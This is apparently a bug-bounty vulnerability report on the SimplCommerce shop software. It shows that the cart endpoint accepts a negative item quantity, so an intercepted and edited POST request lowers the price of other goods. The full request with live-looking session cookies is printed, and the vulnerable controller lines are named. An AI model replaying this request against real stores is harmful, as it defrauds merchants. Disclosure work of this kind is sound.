Business Logic Errors in simplcommerce/simplcommerce
Reported on
Oct 22nd 2021
Description
SimplCommerce allows negative product allowing one to get products for free
The fix here https://github.com/simplcommerce/SimplCommerce/issues/971 does not work because client-side controls can by bypassed by modifying the POST request
Proof of Concept
1: Add one $75 and $25 item in cart.
2: Now go to cart and intercept the request via a proxy and modify the quantity of the $25 item to a negative number
POST /cart/update-item-quantity HTTP/1.1
Host: [SimplCommerce-URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg
Request-Id: |pRtb5.391Gl
Request-Context: appId=cid-v1:de097dc4-1502-4412-8c78-7841be1a73ca
Content-Length: 35
Connection: close
Referer: https://demo.simplcommerce.com/cart
Cookie: SimplUserGuid=91f7b2d4-15a5-4a08-9ce4-00da2c66305d; .AspNetCore.Antiforgery.w5W7x28NAIs=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsTHywY5Br5pCQ57dMzUuRg4fxgXa6fm-N1Gor6FSNlsWweJZXbjubBzprCzSp6SLR337WOpPkz95xI-dVjwjpeMlj0-W9ku50l4dj-xbQpYSBRFbdcS82dwHgJMu2vWI; ARRAffinity=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ARRAffinitySameSite=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ai_user=znO4m|2021-10-22T16:02:08.334Z; _ga=GA1.2.1639028580.1634918529; _gid=GA1.2.7867952.1634918529; ai_session=0lWcm|1634918528717|1634920904054; idsrv.session=ALatLXJs34-rHNZUd8goxw; .AspNetCore.Identity.Application=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsFlvej2SWbsdrnmONGDgt-z9lSvaXNUi-oynMXEMkEDbMRM5pISutqfBFaI6yDLLg3R0-WzdzWkRGO4edSHJmhFGlDVhZpb6VZDTNvxEHM2dLK2LjHJw5P0Rl6WgjToK2YJvAP8VCC69cu9HK_VhayGDxFgrq_5gMPtch7fQvOJRIm533JApctyh60HXs5V1nhoRH_1Yo9_H-ctQM7FAlv9TGVPQ6lxNVulwW8RONrqR5AgicpGp1W7R3mHfYfzmKc5bWLoJk9_1eKbhgVLuzrJZmjg4zHe1veAGnpiagldgpNRtj_7M4Wo0fD3EumNvMuUv9YcyFJr1g4rnxygVIwtN1zhYK2g8hTgPFuEY0SCgpK28LtMIcvDasGVik98XvzOqwd5OD5L8Y8gWCZM0zKI17oNnQGgtSPWODAjWaPhoQPU2pB-C7tNu-LHkyZ-i22_-ZQi2R5SEF-6dUaEGbn0tWrJom4Wu4TWqXEFIcvVODc_KT-tJO4ia1u3n3HozITs-JyXP6hKGGTPlU0gWxWwTeVeblnm_sx-hcEUUrcPwVv5R38AJDWG7yXGIRJv4n9bfcrF5wpFFRsUMLWUd5ERZOu4qOk3qPvT4fHXYqtRdu1fUn9a5c3GexBLWMWgXvPGOrNRGOJg8rrNt-RDWrQSpugXx1HRl-8_vvLvKb5-0mdbBa19eDTxqb8U9MXCBdmFh2t3tr0tXg7ME3JdXR614A1Z-gLtYkatmXwhGpDH3dQyyCKG4mem_cS1bqb23shyreH5wE-wbrF-ZJJmFp1bI-YHwJxY955fbRFF7EwEO-ia6tHNcq_-fVQQv97DyPhrQYN1uDYe4AXF5ss4TJPxbKgiiKoOFCnQJ8qObK0ivf5SemKy4sg60QPVdQq-g7SViZwn16CY0V5brn3Tclu4t03zlnNFHNwU61Qz2vzrY2nsgcwO3HXa9goJe4ChT7o0v4M_DOiagtSDsAp3KKPdY6zb1CAx-Vbm9TPLTrXYd49ZyiqXeo_2K2njmQvJ0z6X0DOwOTMuXQiOSi5WAG; XSRF-TOKEN=CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg
{"cartItemId":372127,"quantity":-2}
3: See that our $75 product now cost $25!
See following picture of a $75 product now costing $25 https://drive.google.com/file/d/1HIb1xp43IYTv7k9j8_S-BNQZa6DiWvrL/view?usp=sharing
Impact
This vulnerability is capable of...
Occurrences
CartController.cs L97L131
Quantity should be checked if its negative
CartController.cs L46L80
Quantity should be checked if its negative
SECURITY.md
2 years ago